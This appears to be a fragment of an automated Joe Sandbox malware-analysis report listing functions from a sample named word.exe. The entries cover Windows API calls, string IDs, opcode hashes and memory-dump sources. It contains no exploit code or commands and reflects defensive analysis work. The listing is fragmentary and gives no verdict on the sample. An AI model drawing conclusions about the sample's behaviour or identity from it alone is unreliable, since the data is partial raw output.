                                                                    • API String ID: 1690418490-0
                                                                    • Opcode ID: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
                                                                    • Instruction ID: 156e5f382d75df54ba3c5c30185d6bb62b1a9e6e0194ec4ef6b9e4a62dbea0b3
                                                                    • Opcode Fuzzy Hash: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
                                                                    • Instruction Fuzzy Hash: 9BE0E5319821216BC6231B30AE4DBCF3B99DB1F311F041827F701D2250CB998404DBA8
                                                                    APIs
                                                                      • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                                                    • CoInitialize.OLE32(00000000), ref: 00475B71
                                                                    • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 00475B8A
                                                                    • CoUninitialize.OLE32 ref: 00475D71
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                    • String ID: .lnk$HH
                                                                    • API String ID: 886957087-3121654589
                                                                    • Opcode ID: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
                                                                    • Instruction ID: f4d7caca580305710a2a5ca379fd8543151c5613ecc12b631d1ff665410dc3a0
                                                                    • Opcode Fuzzy Hash: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
                                                                    • Instruction Fuzzy Hash: B0819D75604300AFD310EF65CC82F5AB3A9EF88704F50892DF658AF2D2D6B5E905CB99
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Delete$InfoItem_memset
                                                                    • String ID: 0
                                                                    • API String ID: 1173514356-4108050209
                                                                    • Opcode ID: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
                                                                    • Instruction ID: b3a4179b3c174fb1a3aa0d908437eb3f68f1f523a6631853a4ee88e897a1c7ed
                                                                    • Opcode Fuzzy Hash: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
                                                                    • Instruction Fuzzy Hash: 31418CB55043019BD710CF19C884B5BBBE5AFC5324F148A6EFCA49B282C375E809CBA6
                                                                    APIs
                                                                    • ClientToScreen.USER32(00000000,?), ref: 00441CDE
                                                                    • GetWindowRect.USER32(?,?), ref: 00441D5A
                                                                    • PtInRect.USER32(?,?,?), ref: 00441D6F
                                                                    • MessageBeep.USER32(00000000,?,?,?,?,?,?,?), ref: 00441DF2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                    • String ID: X1
                                                                    • API String ID: 1352109105-2397719451
                                                                    • Opcode ID: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
                                                                    • Instruction ID: 11ad13a84751b34e4f8a983c71a6a29643224e7bbeba0240db3aabd8edeb2108
                                                                    • Opcode Fuzzy Hash: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
                                                                    • Instruction Fuzzy Hash: E64192B5A042418FE710DF18D884AABB7E5FFC9311F18866FE8518B360D734AC85CBA5
                                                                    APIs
                                                                      • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469368
                                                                    • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00469379
                                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 004693AB
                                                                      • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$_wcslen
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 763830540-1403004172
                                                                    • Opcode ID: a1f9fc2b41bc5883833f08b248cf133d71310afb14c450b0cc4f5bc93ddfdd7e
                                                                    • Instruction ID: 8c71ebf423f389569590ff88e643f185c263fd61562863516bde62979c95be4e
                                                                    • Opcode Fuzzy Hash: a1f9fc2b41bc5883833f08b248cf133d71310afb14c450b0cc4f5bc93ddfdd7e
                                                                    • Instruction Fuzzy Hash: E0210C7160020067C210BB3A9C46FAF77989B85364F09052FF959AB3D1EA7CE94A436E
                                                                    APIs
                                                                    • GetParent.USER32(?), ref: 004505BF
                                                                    • DefDlgProcW.USER32(?,00000138,?,?,004A83D8,?,004A83D8,?), ref: 00450610
                                                                    • DefDlgProcW.USER32(?,00000133,?,?,004A83D8,?,004A83D8,?), ref: 0045065A
                                                                    • DefDlgProcW.USER32(?,00000134,?,?,004A83D8,?,004A83D8,?), ref: 00450688
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Proc$Parent
                                                                    • String ID: X1
                                                                    • API String ID: 2351499541-2397719451
                                                                    • Opcode ID: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                                                                    • Instruction ID: e3e31f905615dd8bfbe674c7a91f48f64006a8638b4dc9b760805e547d05c650
                                                                    • Opcode Fuzzy Hash: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                                                                    • Instruction Fuzzy Hash: 8C3128362411006BC2209B299C58DBB7B58EBC7336F14465BFA54832D3CB769826C768
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: DestroyWindow
                                                                    • String ID: X1$msctls_updown32
                                                                    • API String ID: 3375834691-41712405
                                                                    • Opcode ID: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
                                                                    • Instruction ID: 6a1e1189e42626fde14bc74b9d87f1f450c181bb0fe7a510af516aef360d3f61
                                                                    • Opcode Fuzzy Hash: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
                                                                    • Instruction Fuzzy Hash: CE31A279300201AFD624DF54DC81F5B73A9EB9A714F20451EF640AB382C7B4AC4ACB6A
                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(?), ref: 004439B4
                                                                      • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,756F13E0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                                                                      • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                                                                      • Part of subcall function 0043569D: DuplicateHandle.KERNEL32 ref: 004356C4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentHandleProcess$Duplicate
                                                                    • String ID: nul
                                                                    • API String ID: 2124370227-2873401336
                                                                    • Opcode ID: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
                                                                    • Instruction ID: e5202fea31d744cc2812a948a395a4146b23d8233fafbd02014e3d546f800e0b
                                                                    • Opcode Fuzzy Hash: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
                                                                    • Instruction Fuzzy Hash: 8921A070104301ABE320DF28D886B9B77E4AF94B24F504E1EF9D4972D1E3B5DA54CBA6
                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 004438B7
                                                                      • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,756F13E0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                                                                      • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                                                                      • Part of subcall function 0043569D: DuplicateHandle.KERNEL32 ref: 004356C4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentHandleProcess$Duplicate
                                                                    • String ID: nul
                                                                    • API String ID: 2124370227-2873401336
                                                                    • Opcode ID: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
                                                                    • Instruction ID: 183321404fa0000a7fb955016a75d3ae5bd0bbc3c7f5d4043dd6f74a8503dfc6
                                                                    • Opcode Fuzzy Hash: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
                                                                    • Instruction Fuzzy Hash: 4E2182701002019BE210DF28DC45F9BB7E4AF54B34F204A1EF9E4962D0E7759654CB56
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00441333
                                                                    • LoadLibraryW.KERNEL32(?,?,?,?,0047B4D0,?,?,?,?,?,?,?,?,?,00000000), ref: 0044133A
                                                                    • SendMessageW.USER32(?,00000467,00000000,?), ref: 00441352
                                                                    • DestroyWindow.USER32 ref: 0044135B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                    • String ID: SysAnimate32
                                                                    • API String ID: 3529120543-1011021900
                                                                    • Opcode ID: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
                                                                    • Instruction ID: 28effd0bdeb99d0e0a50349a2d6ccdc4655b9339127a2247ff1827a793b197f6
                                                                    • Opcode Fuzzy Hash: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
                                                                    • Instruction Fuzzy Hash: D0216271204301ABF7209AA5DC84F6B73ECEBD9724F104A1EF651D72E0D6B4DC818729
                                                                    APIs
                                                                    • PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000001), ref: 0044304E
                                                                    • TranslateMessage.USER32(?), ref: 0044308B
                                                                    • DispatchMessageW.USER32(?), ref: 00443096
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004430AD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Message$Peek$DispatchTranslate
                                                                    • String ID: *.*
                                                                    • API String ID: 1795658109-438819550
                                                                    • Opcode ID: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
                                                                    • Instruction ID: a39ada88e739a490af96418dc0f35d82e94fc94c1e76e22fe960a83301852fb1
                                                                    • Opcode Fuzzy Hash: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
                                                                    • Instruction Fuzzy Hash: 9F2138715183419EF720DF289C80FA3B7949B60B05F008ABFF66492191E6B99608C76E
                                                                    APIs
                                                                      • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                      • Part of subcall function 004389A1: SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
                                                                      • Part of subcall function 004389A1: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
                                                                      • Part of subcall function 004389A1: GetCurrentThreadId.KERNEL32(00000000), ref: 004389DA
                                                                      • Part of subcall function 004389A1: AttachThreadInput.USER32(00000000), ref: 004389E1
                                                                    • GetFocus.USER32(?,00000001,004848E8,004848E8,?), ref: 004609EF
                                                                      • Part of subcall function 004389EB: GetParent.USER32(?), ref: 004389F7
                                                                      • Part of subcall function 004389EB: GetParent.USER32(?), ref: 00438A04
                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00460A37
                                                                    • EnumChildWindows.USER32 ref: 00460A60
                                                                    • __swprintf.LIBCMT ref: 00460A7A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_wcslen
                                                                    • String ID: %s%d
                                                                    • API String ID: 991886796-1110647743
                                                                    • Opcode ID: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
                                                                    • Instruction ID: 20a4aa43144560c0524e92d1094e5dcb4402c89d1d481f65a72662ac57dae138
                                                                    • Opcode Fuzzy Hash: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
                                                                    • Instruction Fuzzy Hash: 7521A4712403046BD610FB65DC8AFEFB7ACAF98704F00481FF559A7181EAB8A509877A
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: _memset$_sprintf
                                                                    • String ID: %02X
                                                                    • API String ID: 891462717-436463671
                                                                    • Opcode ID: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
                                                                    • Instruction ID: c3235ccac5cd273424cb9b73a8b9e0f10e05fa8943de770f4571b5c3e9b76774
                                                                    • Opcode Fuzzy Hash: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
                                                                    • Instruction Fuzzy Hash: 5B11E97225021167D314FA698C93BEE724CAB45704F50453FF541A75C1EF6CB558839E
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0042CD00
                                                                    • GetOpenFileNameW.COMDLG32 ref: 0042CD51
                                                                      • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Roaming\word.exe,?,C:\Users\user\AppData\Roaming\word.exe,004A8E80,C:\Users\user\AppData\Roaming\word.exe,0040F3D2), ref: 0040FFCA
                                                                      • Part of subcall function 00410130: SHGetMalloc.SHELL32(00000000), ref: 0041013A
                                                                      • Part of subcall function 00410130: SHGetDesktopFolder.SHELL32(?), ref: 00410150
                                                                      • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 00410160
                                                                      • Part of subcall function 00410130: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410197
                                                                      • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 004101AC
                                                                      • Part of subcall function 00410020: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 00410037
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: NamePath$Full_wcscpy$DesktopFileFolderFromListMallocOpen_memset
                                                                    • String ID: $OH$@OH$X
                                                                    • API String ID: 3491138722-1394974532
                                                                    • Opcode ID: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                                                                    • Instruction ID: e3e81f3fa603e1d093c5df9e9287f390c0398a0e5563e0e16fb911f44c5f658a
                                                                    • Opcode Fuzzy Hash: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                                                                    • Instruction Fuzzy Hash: 2111C2B02043405BC311EF19984175FBBE9AFD5308F14882EF68497292D7FD854DCB9A
                                                                    APIs
                                                                    • LoadLibraryW.KERNEL32(00000000), ref: 00463DD1
                                                                    • GetProcAddress.KERNEL32(?,?,?,?,?), ref: 00463E68
                                                                    • GetProcAddress.KERNEL32(?,00000000,?), ref: 00463E84
                                                                    • GetProcAddress.KERNEL32(?,?,?,?,00000041,?,?,00000000,?), ref: 00463ECE
                                                                    • FreeLibrary.KERNEL32(?,?,?,00000000,?), ref: 00463EF0
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                    • String ID:
                                                                    • API String ID: 2449869053-0
                                                                    • Opcode ID: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                                                                    • Instruction ID: 5a5949aabc30296464acd143044f95cbdcafad8a77d2d24e7d672d776762960f
                                                                    • Opcode Fuzzy Hash: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                                                                    • Instruction Fuzzy Hash: 9051C1752043409FC300EF25C881A5BB7A4FF89305F00456EF945A73A2DB79EE45CBAA
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: KeyboardMessagePostState$InputSend
                                                                    • String ID:
                                                                    • API String ID: 3031425849-0
                                                                    • Opcode ID: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                                                                    • Instruction ID: f46f63d78903415e516a46676784f6fcea1caa301ceb581e17347d916cd8316d
                                                                    • Opcode Fuzzy Hash: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                                                                    • Instruction Fuzzy Hash: DB413B715462446FF760AB24D944BBFBB94AF99324F04061FF9D4122C2D37D9908C77A
                                                                    APIs
                                                                    • RegEnumKeyExW.ADVAPI32 ref: 004422F0
                                                                    • RegOpenKeyExW.ADVAPI32 ref: 0044232B
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0044234E
                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00442390
                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000), ref: 004423C0
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Enum$CloseDeleteOpen
                                                                    • String ID:
                                                                    • API String ID: 2095303065-0
                                                                    • Opcode ID: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
                                                                    • Instruction ID: 24d8057b763805d248a02a33893b377b1579bd56aab3fff97e90bb3d062a49ad
                                                                    • Opcode Fuzzy Hash: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
                                                                    • Instruction Fuzzy Hash: 0C3150721043056EE210DF94DD84FBF73ECEBC9314F44492EBA9596141D7B8E9098B6A
                                                                    APIs
